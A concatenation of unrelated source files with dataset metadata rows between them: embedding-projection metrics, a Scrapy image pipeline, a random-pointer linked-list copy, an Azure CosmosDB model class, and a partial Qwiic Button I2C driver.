print(np.array(obj_emb).shape, np.array(sketch_emb).shape, np.array(sel_objs).shape, np.array(sel_skts).shape, np.array(combined_embs).shape, np.array(labels).shape)
tsne_results = tsne.fit_transform(combined_embs)
objs_tsne, skt_tsne = tsne_results[:len(sel_objs)], tsne_results[len(sel_objs):]
return np.array([np.concatenate((objs_tsne, np.expand_dims(labels, -1)),
axis=1),
np.concatenate((skt_tsne, np.expand_dims(skt_labels, -1)),
axis=1)])
class EmbeddingsFromTripletTSNEProjection(ProjectionMetric):
name = 'common-obj-rep-tsne'
input_type = 'rep_SBIR_on_validation_set'
plot_type = 'scatter-with-shapes'
def compute(self, input_data):
_, _, _, _, _, R_ave, mAP, obj_emb, sketch_emb, y = input_data
skt_y = y
np.random.seed(14)
idx = np.random.permutation(len(y))
skt_idx = np.random.permutation(len(skt_y))
np.random.seed()
sel_objs, sel_skts, labels, skt_labels, sel_labels, counter, label_counter = [], [], [], [], [], 0, 0
y = y[idx]
obj_emb = obj_emb[idx]
skt_y = skt_y[skt_idx]
sketch_emb = sketch_emb[skt_idx]
for skt, label in zip(sketch_emb, skt_y):
if label not in sel_labels and label_counter < 10:
sel_labels.append(label)
label_counter += 1
if label in sel_labels:
sel_skts.append(skt)
skt_labels.append(label)
counter += 1
if counter >= 1000:
break
counter = 0
for obj, label in zip(obj_emb, y):
if label not in sel_labels and label_counter < 10:
sel_labels.append(label)
label_counter += 1
if label in sel_labels:
sel_objs.append(obj)
labels.append(label)
counter += 1
if counter >= 1000:
break
tsne = TSNE(n_components=2,
verbose=0, perplexity=30,
n_iter=1000,
random_state=14)
combined_embs = np.concatenate((sel_objs, sel_skts), axis=0)
print(np.array(obj_emb).shape, np.array(sketch_emb).shape, np.array(sel_objs).shape, np.array(sel_skts).shape, np.array(combined_embs).shape, np.array(labels).shape)
tsne_results = tsne.fit_transform(combined_embs)
objs_tsne, skt_tsne = tsne_results[:len(sel_objs)], tsne_results[len(sel_objs):]
return np.array([np.concatenate((objs_tsne, labels),
axis=1),
np.concatenate((skt_tsne, skt_labels),
axis=1)])
class ClusterTSNEProjection(ProjectionMetric):
name = 'tsne-cluster'
input_type = 'predictions_on_validation_set'
def compute(self, input_data):
x, y, pred_x, pred_y, pred_z, tokenizer, plot_filepath, tmp_filepath = input_data
np.random.seed(14)
idx = np.random.permutation(len(x))
np.random.seed()
feats, labels, sel_labels, counter, label_counter = [], [], [], 0, 0
x, y, pred_z = x[idx], y[idx], pred_z[idx]
for sketch, label, feature in zip(x, y, pred_z):
if label not in sel_labels and label_counter < 10:
sel_labels.append(label)
label_counter += 1
if label in sel_labels:
feats.append(feature)
labels.append(label)
counter += 1
if counter >= 1000:
break
tsne = TSNE(n_components=2,
verbose=0, perplexity=30,
n_iter=1000,
random_state=14)
tsne_results = tsne.fit_transform(feats)
kmeans = KMeans(n_clusters=30, random_state=14).fit(feats)
cluster_labels = kmeans.labels_
sel_feats, feats_labels = None, None
for i in range(30):
clustered_feats = np.array(tsne_results)[np.where(cluster_labels == i)[0]]
sel_feats = np.concatenate((sel_feats, clustered_feats)) if sel_feats is not None else clustered_feats
feat_label = np.ones(len(clustered_feats,)) * i
feats_labels = np.concatenate((feats_labels, feat_label)) if feats_labels is not None else feat_label
np.random.seed()
return np.concatenate((sel_feats, np.expand_dims(feats_labels, axis=1)),
axis=1)
class PredictedLabelsTSNEProjection(ProjectionMetric):
name = 'tsne-predicted'
input_type = 'predictions_on_validation_set'
def compute(self, input_data):
x, y, pred_x, pred_y, pred_z, tokenizer, plot_filepath, tmp_filepath = input_data
np.random.seed(14)
idx = np.random.permutation(len(y))
np.random.seed()
feats, labels, sel_labels, counter, label_counter = [], [], [], 0, 0
y, pred_z, pred_y = y[idx], pred_z[idx], pred_y[idx]
for label, feature, pred_label in zip(y, pred_z, pred_y):
if label not in sel_labels and label_counter < 10:
sel_labels.append(label)
label_counter += 1
if label in sel_labels:
feats.append(feature)
labels.append(pred_label)
counter += 1
if counter >= 1000:
break
tsne = TSNE(n_components=2,
verbose=0, perplexity=30,
n_iter=1000,
random_state=14)
tsne_results = tsne.fit_transform(feats)
return np.concatenate((tsne_results, np.expand_dims(labels, axis=1)),
axis=1)
class PCAProjection(ProjectionMetric):
name = 'pca'
input_type = 'predictions_on_validation_set'
def compute(self, input_data):
entries, _, plot_filepath, tmp_filepath = input_data
np.random.seed(14)
idx = np.random.permutation(len(entries))
np.random.seed()
feats, labels, sel_labels, counter, label_counter = [], [], [], 0, 0
for i in idx:
skt = entries[i]
if skt['label'] not in sel_labels and label_counter < 10:
sel_labels.append(skt['label'])
label_counter += 1
if skt['label'] in sel_labels:
feats.append(skt['features'])
labels.append(skt['label'])
counter += 1
if counter >= 1000:
break
pca = PCA(n_components=2)
pca.fit(feats)
pca_result = pca.transform(feats)
return np.concatenate((pca_result, np.expand_dims(labels, axis=1)),
axis=1)
| true
| true
|
1c4218ccb0778ac35e790ae6907fa890294ef128
| 2,321
|
py
|
Python
|
codes/apks/pipelines/image_download_pipeline.py
|
RiskySignal/APKCrawler
|
28e1cbccdd378bcb66d020349877f1d87679f8bd
|
[
"MIT"
] | 11
|
2020-11-26T08:15:56.000Z
|
2022-03-30T11:15:39.000Z
|
codes/apks/pipelines/image_download_pipeline.py
|
RiskySignal/APKCrawler
|
28e1cbccdd378bcb66d020349877f1d87679f8bd
|
[
"MIT"
] | 1
|
2021-01-15T02:04:12.000Z
|
2021-01-15T02:41:01.000Z
|
codes/apks/pipelines/image_download_pipeline.py
|
RiskySignal/APKCrawler
|
28e1cbccdd378bcb66d020349877f1d87679f8bd
|
[
"MIT"
] | 2
|
2021-07-21T19:17:56.000Z
|
2022-02-14T07:36:11.000Z
|
# coding=utf-8
import logging
from scrapy.pipelines.images import ImagesPipeline
from items import AppDetail
from scrapy.utils.python import to_bytes
import hashlib
import scrapy
import os
from pipelines.folder_path import get_app_folder
import settings as project_settings
from database import Database
class ImageDownloadPipeline(ImagesPipeline):
logger = logging.getLogger("ImageDownloadPipeline")
def __init__(self, store_uri, download_func=None, settings=None):
super().__init__(store_uri, download_func, settings)
self.db = Database()
def get_media_requests(self, item: AppDetail, info):
app_folder = get_app_folder(item)
file_path = os.path.relpath(app_folder, project_settings.FILES_STORE)
image_length = len(item['picture_links'])
pruned_picture_links = []
pruned_picture_link_ids = []
for _image_index_ in range(image_length):
picture_link = item['picture_links'][_image_index_]
picture_link_id = item['picture_link_ids'][_image_index_]
if not self.db.get_image_status(picture_link_id):
pruned_picture_links.append(picture_link)
pruned_picture_link_ids.append(picture_link_id)
else:
logging.info("Image file {} exists.".format(picture_link))
item['picture_links'] = pruned_picture_links
item['picture_link_ids'] = pruned_picture_link_ids
for picture_link in item['picture_links']:
yield scrapy.Request(picture_link, meta={'file_path': file_path})
def file_path(self, request, response=None, info=None, *, item=None):
image_guid = hashlib.sha1(to_bytes(request.url)).hexdigest()
return os.path.join(request.meta['file_path'], "%s.jpg" % image_guid)
def item_completed(self, results, item: AppDetail, info):
for result_index in range(len(results)):
result = results[result_index]
if result[0]:
self.logger.info("Download image '{}' successfully.".format(item['picture_links'][result_index]))
self.db.set_image_available(item['picture_link_ids'][result_index])
else:
self.logger.error("Fail to download image '{}'.".format(item['picture_links'][result_index]))
return item
| 41.446429
| 113
| 0.687635
|
import logging
from scrapy.pipelines.images import ImagesPipeline
from items import AppDetail
from scrapy.utils.python import to_bytes
import hashlib
import scrapy
import os
from pipelines.folder_path import get_app_folder
import settings as project_settings
from database import Database
class ImageDownloadPipeline(ImagesPipeline):
logger = logging.getLogger("ImageDownloadPipeline")
def __init__(self, store_uri, download_func=None, settings=None):
super().__init__(store_uri, download_func, settings)
self.db = Database()
def get_media_requests(self, item: AppDetail, info):
app_folder = get_app_folder(item)
file_path = os.path.relpath(app_folder, project_settings.FILES_STORE)
image_length = len(item['picture_links'])
pruned_picture_links = []
pruned_picture_link_ids = []
for _image_index_ in range(image_length):
picture_link = item['picture_links'][_image_index_]
picture_link_id = item['picture_link_ids'][_image_index_]
if not self.db.get_image_status(picture_link_id):
pruned_picture_links.append(picture_link)
pruned_picture_link_ids.append(picture_link_id)
else:
logging.info("Image file {} exists.".format(picture_link))
item['picture_links'] = pruned_picture_links
item['picture_link_ids'] = pruned_picture_link_ids
for picture_link in item['picture_links']:
yield scrapy.Request(picture_link, meta={'file_path': file_path})
def file_path(self, request, response=None, info=None, *, item=None):
image_guid = hashlib.sha1(to_bytes(request.url)).hexdigest()
return os.path.join(request.meta['file_path'], "%s.jpg" % image_guid)
def item_completed(self, results, item: AppDetail, info):
for result_index in range(len(results)):
result = results[result_index]
if result[0]:
self.logger.info("Download image '{}' successfully.".format(item['picture_links'][result_index]))
self.db.set_image_available(item['picture_link_ids'][result_index])
else:
self.logger.error("Fail to download image '{}'.".format(item['picture_links'][result_index]))
return item
| true
| true
|
1c4218f8f1a6553933731f5deb42365604dfe0b2
| 2,123
|
py
|
Python
|
src/interviewbit/hash/copy_list.py
|
JadielTeofilo/General-Algorithms
|
dfcf86c6ecd727573079f8971187c47bdb7a37bb
|
[
"MIT"
] | null | null | null |
src/interviewbit/hash/copy_list.py
|
JadielTeofilo/General-Algorithms
|
dfcf86c6ecd727573079f8971187c47bdb7a37bb
|
[
"MIT"
] | null | null | null |
src/interviewbit/hash/copy_list.py
|
JadielTeofilo/General-Algorithms
|
dfcf86c6ecd727573079f8971187c47bdb7a37bb
|
[
"MIT"
] | null | null | null |
"""
A linked list is given such that each node contains an additional random pointer which could point to any node in the list or NULL.
Return a deep copy of the list.
Example
Given list
_
1 -> 2 -> 3
_
1 -> 2
keep a visited
last
root
1
2 4
1 3 2
dfs on the tree skiping visited nodes
receive two node from the elements bellow (next and random)
stop when no unvisited children is found
add a node and return
with random pointers going from
1 -> 3
2 -> 1
3 -> 1
You should return a deep copy of the list. The returned answer should not contain the same node as the original list, but a copy of them. The pointers in the returned list should not link to any node in the original input list.
O(n) time complexity
O(n) space complexity cuz recursion
"""
from typing import List, Dict, Set, Optional
# Definition for singly-linked list with a random pointer.
class RandomListNode:
def __init__(self, x):
self.label = x
self.next = None
self.random = None
class Solution:
# @param head, a RandomListNode
# @return a RandomListNode
def copyRandomList(self, head: RandomListNode) -> Optional[RandomListNode]:
visited: Dict[int, RandomListNode] = dict()
root = self.copy_list(head, visited)
while head:
if head.random:
visited[head.label].random = visited[head.random.label]
head = head.next
return root
def copy_list(self, head: RandomListNode,
visited: Dict[int, RandomListNode]) -> Optional[RandomListNode]:
if not head:
return
if head.label in visited:
return visited[head.label]
curr: RandomListNode = RandomListNode(head.label)
visited[head.label] = curr
next_copy, random_copy = None, None
if head.next:
next_copy = self.copy_list(head.next,
visited)
curr.next = next_copy
return curr
| 26.5375
| 227
| 0.607631
|
from typing import List, Dict, Set, Optional
class RandomListNode:
def __init__(self, x):
self.label = x
self.next = None
self.random = None
class Solution:
def copyRandomList(self, head: RandomListNode) -> Optional[RandomListNode]:
visited: Dict[int, RandomListNode] = dict()
root = self.copy_list(head, visited)
while head:
if head.random:
visited[head.label].random = visited[head.random.label]
head = head.next
return root
def copy_list(self, head: RandomListNode,
visited: Dict[int, RandomListNode]) -> Optional[RandomListNode]:
if not head:
return
if head.label in visited:
return visited[head.label]
curr: RandomListNode = RandomListNode(head.label)
visited[head.label] = curr
next_copy, random_copy = None, None
if head.next:
next_copy = self.copy_list(head.next,
visited)
curr.next = next_copy
return curr
| true
| true
|
1c4219c10b3a2ceaaedd396a815c22e2d089d4d4
| 1,097
|
py
|
Python
|
azure-mgmt-cosmosdb/azure/mgmt/cosmosdb/models/database_account_regenerate_key_parameters.py
|
SUSE/azure-sdk-for-python
|
324f99d26dd6f4ee9793b9bf1d4d5f928e4b6c2f
|
[
"MIT"
] | 2
|
2020-07-29T14:22:17.000Z
|
2020-11-06T18:47:40.000Z
|
azure-mgmt-cosmosdb/azure/mgmt/cosmosdb/models/database_account_regenerate_key_parameters.py
|
SUSE/azure-sdk-for-python
|
324f99d26dd6f4ee9793b9bf1d4d5f928e4b6c2f
|
[
"MIT"
] | 1
|
2016-08-01T07:37:04.000Z
|
2016-08-01T07:37:04.000Z
|
azure-mgmt-cosmosdb/azure/mgmt/cosmosdb/models/database_account_regenerate_key_parameters.py
|
SUSE/azure-sdk-for-python
|
324f99d26dd6f4ee9793b9bf1d4d5f928e4b6c2f
|
[
"MIT"
] | 1
|
2020-12-12T21:04:41.000Z
|
2020-12-12T21:04:41.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class DatabaseAccountRegenerateKeyParameters(Model):
"""Parameters to regenerate the keys within the database account.
:param key_kind: The access key to regenerate. Possible values include:
'primary', 'secondary', 'primaryReadonly', 'secondaryReadonly'
:type key_kind: str or :class:`KeyKind
<azure.mgmt.cosmosdb.models.KeyKind>`
"""
_validation = {
'key_kind': {'required': True},
}
_attribute_map = {
'key_kind': {'key': 'keyKind', 'type': 'str'},
}
def __init__(self, key_kind):
self.key_kind = key_kind
| 32.264706
| 76
| 0.600729
|
from msrest.serialization import Model
class DatabaseAccountRegenerateKeyParameters(Model):
_validation = {
'key_kind': {'required': True},
}
_attribute_map = {
'key_kind': {'key': 'keyKind', 'type': 'str'},
}
def __init__(self, key_kind):
self.key_kind = key_kind
| true
| true
|
1c4219fff67ffabcc60003d010889745dc2acda1
| 28,399
|
py
|
Python
|
qwiic_button.py
|
sparkfun/Qwiic_Button_Py
|
c7d4a195e7d379c38ee23f445a514a06c92ef8d4
|
[
"MIT"
] | null | null | null |
qwiic_button.py
|
sparkfun/Qwiic_Button_Py
|
c7d4a195e7d379c38ee23f445a514a06c92ef8d4
|
[
"MIT"
] | 2
|
2021-02-14T02:05:05.000Z
|
2021-03-11T16:49:08.000Z
|
qwiic_button.py
|
sparkfun/Qwiic_Button_Py
|
c7d4a195e7d379c38ee23f445a514a06c92ef8d4
|
[
"MIT"
] | null | null | null |
#-----------------------------------------------------------------------------
# qwiic_button.py
#
# Python library for the SparkFun qwiic button.
# https://www.sparkfun.com/products/15932
#
#------------------------------------------------------------------------
#
# Written by Priyanka Makin @ SparkFun Electronics, January 2021
#
# This python library supports the SparkFun Electroncis qwiic
# qwiic sensor/board ecosystem
#
# More information on qwiic is at https:// www.sparkfun.com/qwiic
#
# Do you like this library? Help support SparkFun. Buy a board!
#==================================================================================
# Copyright (c) 2020 SparkFun Electronics
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#==================================================================================
"""
qwiic_button
============
Python module for the Qwiic Button.
This python package is a port of the exisiting [SparkFun Qwiic Button Arduino Library](https://github.com/sparkfun/SparkFun_Qwiic_Button_Arduino_Library)
This package can be used in conjunction with the overall [SparkFun Qwiic Python Package](https://github.com/sparkfun/Qwiic_Py)
New to qwiic? Take a look at the entire [SparkFun Qwiic Ecosystem](https://www.sparkfun.com/qwiic).
"""
#-----------------------------------------------------------------------------------
import math
import qwiic_i2c
# Define the device name and I2C addresses. These are set in the class definition
# as class variables, making them available without having to create a class instance.
# This allows higher level logic to rapidly create an index of qwiic devices at runtime.
# This is the name of the device
_DEFAULT_NAME = "Qwiic Button"
# Some devices have multiple available addresses - this is a list of these addresses.
# NOTE: The first address in this list is considered the default I2C address for the
# device.
_QWIIC_BUTTON_DEFAULT_ADDRESS = 0x6F
_FULL_ADDRESS_LIST = list(range(0x08, 0x77+1)) # Full address list (excluding reserved addresses)
_FULL_ADDRESS_LIST.remove(_QWIIC_BUTTON_DEFAULT_ADDRESS >> 1) # Remove default address from list
_AVAILABLE_I2C_ADDRESS = [_QWIIC_BUTTON_DEFAULT_ADDRESS] # Initialize with default address
_AVAILABLE_I2C_ADDRESS.extend(_FULL_ADDRESS_LIST) # Add full range of I2C addresses
# Define the class that encapsulates the device being created. All information associated
# with this device is encapsulated by this class. The device class should be the only value
# exported from this module.
class QwiicButton(object):
""""
QwiicButton
:param address: The I2C address to use for the device.
If not provided, the default address is used.
:param i2c_driver: An existing i2c driver object. If not provided
a driver object is created.
:return: The GPIO device object.
:rtype: Object
"""
# Constructor
device_name = _DEFAULT_NAME
available_addresses = _AVAILABLE_I2C_ADDRESS
# Device ID for all Qwiic Buttons
DEV_ID = 0x5D
# Registers
ID = 0x00
FIRMWARE_MINOR = 0x01
FIRMWARE_MAJOR = 0x02
BUTTON_STATUS = 0x03
INTERRUPT_CONFIG = 0x04
BUTTON_DEBOUNCE_TIME = 0x05
PRESSED_QUEUE_STATUS = 0x07
PRESSED_QUEUE_FRONT = 0x08
PRESSED_QUEUE_BACK = 0x0C
CLICKED_QUEUE_STATUS = 0x10
CLICKED_QUEUE_FRONT = 0x11
CLICKED_QUEUE_BACK = 0x15
LED_BRIGHTNESS = 0x19
LED_PULSE_GRANULARITY = 0x1A
LED_PULSE_CYCLE_TIME = 0x1B
LED_PULSE_OFF_TIME = 0x1D
I2C_ADDRESS = 0x1F
# Status Flags
event_available = 0
has_been_clicked = 0
is_pressed = 0
# Interrupt Configuration Flags
clicked_enable = 0
pressed_enable = 0
# Pressed Queue Status Flags
pressed_pop_request = 0
pressed_is_empty = 0
pressed_is_full = 0
# Clicked Queue Status Flags
clicked_pop_request = 0
clicked_is_empty = 0
clicked_is_full = 0
# Constructor
def __init__(self, address=None, i2c_driver=None):
# Did the user specify an I2C address?
self.address = address if address != None else self.available_addresses[0]
# Load the I2C driver if one isn't provided
if i2c_driver == None:
self._i2c = qwiic_i2c.getI2CDriver()
if self._i2c == None:
print("Unable to load I2C driver for this platform.")
return
else:
self._i2c = i2c_driver
# -----------------------------------------------
# is_connected()
#
# Is an actual board connected to our system?
def is_connected(self):
"""
Determine if a Qwiic Button device is connected to the system.
:return: True if the device is connected, otherwise False.
:rtype: bool
"""
return qwiic_i2c.isDeviceConnected(self.address)
# ------------------------------------------------
# begin()
#
# Initialize the system/validate the board.
def begin(self):
"""
Initialize the operation of the Qwiic Button
Run is_connected() and check the ID in the ID register
:return: Returns true if the intialization was successful, otherwise False.
:rtype: bool
"""
if self.is_connected() == True:
id = self._i2c.readByte(self.address, self.ID)
if id == self.DEV_ID:
return True
return False
# ------------------------------------------------
# get_firmware_version()
#
# Returns the firmware version of the attached devie as a 16-bit integer.
# The leftmost (high) byte is the major revision number,
# and the rightmost (low) byte is the minor revision number.
def get_firmware_version(self):
"""
Read the register and get the major and minor firmware version number.
:return: 16 bytes version number
:rtype: int
"""
version = self._i2c.readByte(self.address, self.FIRMWARE_MAJOR) << 8
version |= self._i2c.readByte(self.address, self.FIRMWARE_MINOR)
return version
# -------------------------------------------------
# set_I2C_address(new_address)
#
# Configures the attached device to attach to the I2C bus using the specified address
def set_I2C_address(self, new_address):
"""
Change the I2C address of the Qwiic Button
:param new_address: the new I2C address to set the Qwiic Button to
The function itself checks if the entered parameter is a valid I2C address
:return: True if the change was successful, false otherwise.
:rtype: bool
"""
# First, check if the specified address is valid
if new_address < 0x08 or new_address > 0x77:
return False
# Write new address to the I2C address register of the Qwiic Button
self._i2c.writeByte(self.address, self.I2C_ADDRESS, new_address)
self.address = new_address
# ---------------------------------------------------
# get_I2C_address()
#
# Returns the I2C address of the device
def get_I2C_address(self):
"""
Returns the current I2C address of the Qwiic Button
:return: current I2C address
:rtype: int
"""
return self.address
# ---------------------------------------------------
# is_button_pressed()
#
# Returns 1 if the button/switch is pressed, 0 otherwise
def is_button_pressed(self):
"""
Returns the value of the is_pressed status bit of the BUTTON_STATUS register
:return: is_pressed bit
:rtype: bool
"""
# Read the button status register
button_status = self._i2c.readByte(self.address, self.BUTTON_STATUS)
# Convert to binary and clear all bits but is_pressed
self.is_pressed = int(button_status) & ~(0xFB)
# Shift is_pressed to the zero bit
self.is_pressed = self.is_pressed >> 2
# Return is_pressed as a bool
return bool(self.is_pressed)
# ----------------------------------------------------
# has_button_been_clicked()
#
# Returns 1 if the button/switch is clicked, and 0 otherwise
def has_button_been_clicked(self):
"""
Returns the value of the has_been_clicked status bit of the BUTTON_STATUS register
:return: has_been_clicked bit
:rtype: bool
"""
# Read the button status register
button_status = self._i2c.readByte(self.address, self.BUTTON_STATUS)
# Convert to binary and clear all bits but has_been_clicked
self.has_been_clicked = int(button_status) & ~(0xFD)
# Shift has_been_clicked to the zero bit
self.has_been_clicked = self.has_been_clicked >> 1
# Return has_been_clicked as a bool
return bool(self.has_been_clicked)
# ------------------------------------------------------
# get_debounce_time()
#
# Returns the time that the button waits for the mechanical
# contacts to settle in milliseconds.
def get_debounce_time(self):
"""
Returns the value in the BUTTON_DEBOUNCE_TIME register
:return: debounce time in milliseconds
:rtype: int
"""
time_list = self._i2c.readBlock(self.address, self.BUTTON_DEBOUNCE_TIME, 2)
time = int(time_list[0]) + int(time_list[1]) * 16 ** (2)
return time
# -------------------------------------------------------
# set_debounce_time(time)
#
# Sets the time that the button waits for the mechanical
# contacts to settle in milliseconds.
def set_debounce_time(self, time):
"""
Write two bytes into the BUTTON_DEBOUNCE_TIME register
:param time: the time in milliseconds to set debounce time to
The max debounce time is 0xFFFF milliseconds, but the function checks if
the entered parameter is valid
:return: Nothing
:rtype: void
"""
# First check that time is not too big
if time > 0xFFFF:
time = 0xFFFF
time1 = time & ~(0xFF00)
time2 = time & ~(0x00FF)
time2 = time2 >> 8
time_list = [time1, time2]
# Then write two bytes
self._i2c.writeWord(self.address, self.BUTTON_DEBOUNCE_TIME, time)
# -------------------------------------------------------
# enable_pressed_interrupt()
#
# The interrupt will be configured to trigger when the button
# is pressed. If enableClickedInterrupt() has also been called,
# then the interrupt will trigger on either a push or a click.
def enable_pressed_interrupt(self):
"""
Set pressed_enable bit of the INTERRUPT_CONFIG register to a 1
:return: Nothing
:rtype: Void
"""
# First, read the INTERRUPT_CONFIG register
interrupt_config = self._i2c.readByte(self.address, self.INTERRUPT_CONFIG)
self.pressed_enable = 1
# Set the pressed_enable bit
interrupt_config = interrupt_config | (self.pressed_enable << 1)
# Write the new interrupt configure byte
self._i2c.writeByte(self.address, self.INTERRUPT_CONFIG, interrupt_config)
# -------------------------------------------------------
# disable_pressed_interrupt()
#
# Interrupt will no longer be configured to trigger when the
# button is pressed. If enable_clicked_interrupt() has also been called,
# then the interrupt will still trigger on the button click.
def disable_pressed_interrupt(self):
"""
Clear the pressed_enable bit of the INTERRUPT_CONFIG register
:return: Nothing
:rtype: Void
"""
# First, read the INTERRUPT_CONFIG register
interrupt_config = self._i2c.readByte(self.address, self.INTERRUPT_CONFIG)
self.pressed_enable = 0
# Clear the pressed_enable bit
interrupt_config = interrupt_config & ~(1 << 1)
# Write the new interrupt configure byte
self._i2c.writeByte(self.address, self.INTERRUPT_CONFIG, interrupt_config)
# -------------------------------------------------------
# enable_clicked_interrupt()
#
# The interrupt will be configured to trigger when the button
# is clicked. If enable_pressed_interrupt() has also been called,
# then the interrupt will trigger on either a push or a click.
def enable_clicked_interrupt(self):
"""
Set the clicked_enable bit of the INTERRUPT_CONFIG register
:return: Nothing
:rtype: Void
"""
# First, read the INTERRUPT_CONFIG register
interrupt_config = self._i2c.readByte(self.address, self.INTERRUPT_CONFIG)
self.clicked_enable = 1
# Set the clicked_enable bit
interrupt_config = interrupt_config | self.clicked_enable
# Write the new interrupt configure byte
self._i2c.writeByte(self.address, self.INTERRUPT_CONFIG, interrupt_config)
# -------------------------------------------------------
# disable_clicked_interrupt()
#
# The interrupt will no longer be configured to trigger when
# the button is clicked. If enable_pressed_interrupt() has also
# been called, then the interrupt will still trigger on the
# button press.
def disable_clicked_interrupt(self):
"""
Clear the clicked_enable bit of the INTERRUPT_CONFIG register
:return: Nothing
:rtype: Void
"""
# First, read the INTERRUPT_CONFIG register
interrupt_config = self._i2c.readByte(self.address, self.INTERRUPT_CONFIG)
self.clicked_enable = 0
# Clear the clicked_enable bit
interrupt_config = interrupt_config & (self.clicked_enable)
# Write the new interrupt configure byte
self._i2c.writeByte(self.address, self.INTERRUPT_CONFIG, interrupt_config)
# -------------------------------------------------------
# available()
#
# Returns the eventAvailble bit. This bit is set to 1 if a
# button click or press event occurred.
def available(self):
"""
Return the event_available bit of the BUTTON_STATUS register
:return: event_available bit
:rtye: bool
"""
# First, read BUTTON_STATUS register
button_status = self._i2c.readByte(self.address, self.BUTTON_STATUS)
# Convert to binary and clear all bits but the event_available bit
self.event_available = int(button_status) & ~(0xFE)
# Return event_available bit as a bool
return bool(self.event_available)
# -------------------------------------------------------
# clear_event_bits()
#
# Sets all button status bits (is_pressed, has_been_clicked,
# and event_available) to zero.
def clear_event_bits(self):
"""
Clear the is_pressed, has_been_clicked, and event_available
bits of the BUTTON_STATUS register
:return: Nothing
:rtype: Void
"""
# First, read BUTTON_STATUS register
button_status = self._i2c.readByte(self.address, self.BUTTON_STATUS)
# Convert to binary and clear the last three bits
button_status = int(button_status) & ~(0x7)
# Write to BUTTON_STATUS register
self._i2c.writeByte(self.address, self.BUTTON_STATUS, button_status)
# -------------------------------------------------------
# reset_interrupt_config()
#
# Resets the interrupt configuration back to defaults.
def reset_interrupt_config(self):
"""
Enable pressed and clicked interrupts and clear the
event_available bit of BUTTON_STATUS register
:return: Nothing
:rtype: Void
"""
self.pressed_enable = 1
self.clicked_enable = 1
# write 0b11 to the INTERRUPT_CONFIG register
self._i2c.writeByte(self.address, self.INTERRUPT_CONFIG, 0b11)
self.event_available = 0
# Clear has_been_clicked, is_pressed too
# TODO: not sure if this is right
self.has_been_clicked = 0
self.is_pressed = 0
# Clear the BUTTON_STATUS register by writing a 0
self._i2c.writeByte(self.address, self.BUTTON_STATUS, 0x00)
# -------------------------------------------------------
# is_pressed_queue_full()
#
# Returns true if queue of button press time stamps is full,
# and false otherwise.
def is_pressed_queue_full(self):
"""
Returns the is_full bit of the PRESSED_QUEUE_STATUS register
:return: pressed_is_full
:rtype: bool
"""
# First, read the PRESSED_QUEUE_STATUS register
pressed_queue_stat = self._i2c.readByte(self.address, self.PRESSED_QUEUE_STATUS)
# Convert to binary and clear all bits but isFull
self.pressed_is_full = int(pressed_queue_stat) & ~(0xFB)
self.pressed_is_full = self.pressed_is_full >> 2
# Return pressed_is_full as a bool
return bool(self.pressed_is_full)
# -------------------------------------------------------
# is_pressed_queue_empty()
#
# Returns true if the queue of button press time stamps is
# empty, and false otherwise.
def is_pressed_queue_empty(self):
"""
Returns the is_empty bit of the PRESSED_QUEUE_STATUS register
:return: pressed_is_empty
:rtype: bool
"""
# First, read the PRESSED_QUEUE_STATUS register
pressed_queue_stat = self._i2c.readByte(self.address, self.PRESSED_QUEUE_STATUS)
# Convert to binary and clear all bits but is_empty
self.pressed_is_empty = int(pressed_queue_stat) & ~(0xFD)
# Shift pressed_is_empty to the zero bit
self.pressed_is_empty = self.pressed_is_empty >> 1
# Return pressed_is_empty as a bool
return bool(self.pressed_is_empty)
# ------------------------------------------------------
# time_since_last_press()
#
# Returns how many milliseconds it has been since the last
# button press. Since this returns a 32-bit int, it will
# roll over about every 50 days.
def time_since_last_press(self):
"""
Returns the four bytes of PRESSED_QUEUE_FRONT.
Time in milliseconds.
:return: PRESSED_QUEUE_FRONT
:rtype: int
"""
time_list = self._i2c.readBlock(self.address, self.PRESSED_QUEUE_FRONT, 4)
time = int(time_list[0]) + int(time_list[1]) * 16 ** (2) + int(time_list[2]) * 16 ** (4) + int(time_list[3]) * 16 ** (6)
return time
# -------------------------------------------------------
# time_since_first_press()
#
# Returns how many milliseconds it has been since the first
# button press. Since this returns a 32-bit int, it will
# roll over about every 50 days.
def time_since_first_press(self):
"""
Returns the four bytes of PRESSED_QUEUE_BACK.
Time in milliseconds
:return: PRESSED_QUEUE_BACK
:rtype: int
"""
time_list = self._i2c.readBlock(self.address, self.PRESSED_QUEUE_BACK, 4)
time = int(time_list[0]) + int(time_list[1]) * 16 ** (2) + int(time_list[2]) * 16 ** (4) + int(time_list[3]) * 16 ** (6)
return time
# -------------------------------------------------------
# pop_pressed_queue()
#
# Returns the oldest value in the queue (milliseconds since
# first button press), and then removes it.
def pop_pressed_queue(self):
"""
Returns contents of PRESSED_QUEUE_BACK register and
writes a 1 to popRequest bit of PRESSED_QUEUE_STATUS
register.
:return: PRESSED_QUEUE_BACK
:rtype: int
"""
# Get the time in milliseconds since the button was first pressed
temp_data = self.time_since_first_press()
# Read PRESSED_QUEUE_STATUS register
pressed_queue_stat = self._i2c.readByte(self.address, self.PRESSED_QUEUE_STATUS)
self.pressed_pop_request = 1
# Set pop_request bit to 1
pressed_queue_stat = pressed_queue_stat | (self.pressed_pop_request)
self._i2c.writeByte(self.address, self.PRESSED_QUEUE_STATUS, pressed_queue_stat)
return temp_data
# ---------------------------------------------------------
# is_clicked_queue_full()
#
